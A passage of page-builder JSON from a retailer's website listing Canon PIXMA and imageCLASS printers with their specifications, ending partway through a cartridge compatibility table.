E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL 